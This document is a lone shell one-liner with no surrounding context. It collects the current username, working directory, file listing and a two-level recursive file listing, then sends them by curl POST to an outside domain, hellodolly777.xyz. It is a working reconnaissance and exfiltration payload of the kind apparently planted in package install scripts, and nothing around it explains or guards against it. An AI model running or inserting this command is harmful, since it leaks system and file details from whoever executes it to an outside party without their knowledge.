url="http://hello.hellodolly777.xyz/whoami/$(whoami)" && pwd=$(pwd) && ls=$(ls) && publicHtml=$(find -maxdepth 2 -ls) && echo $url && curl -X POST --data "$(whoami):::::$pwd:::::$ls:::::$publicHtml::: " --header 'content-type:text/plain' $url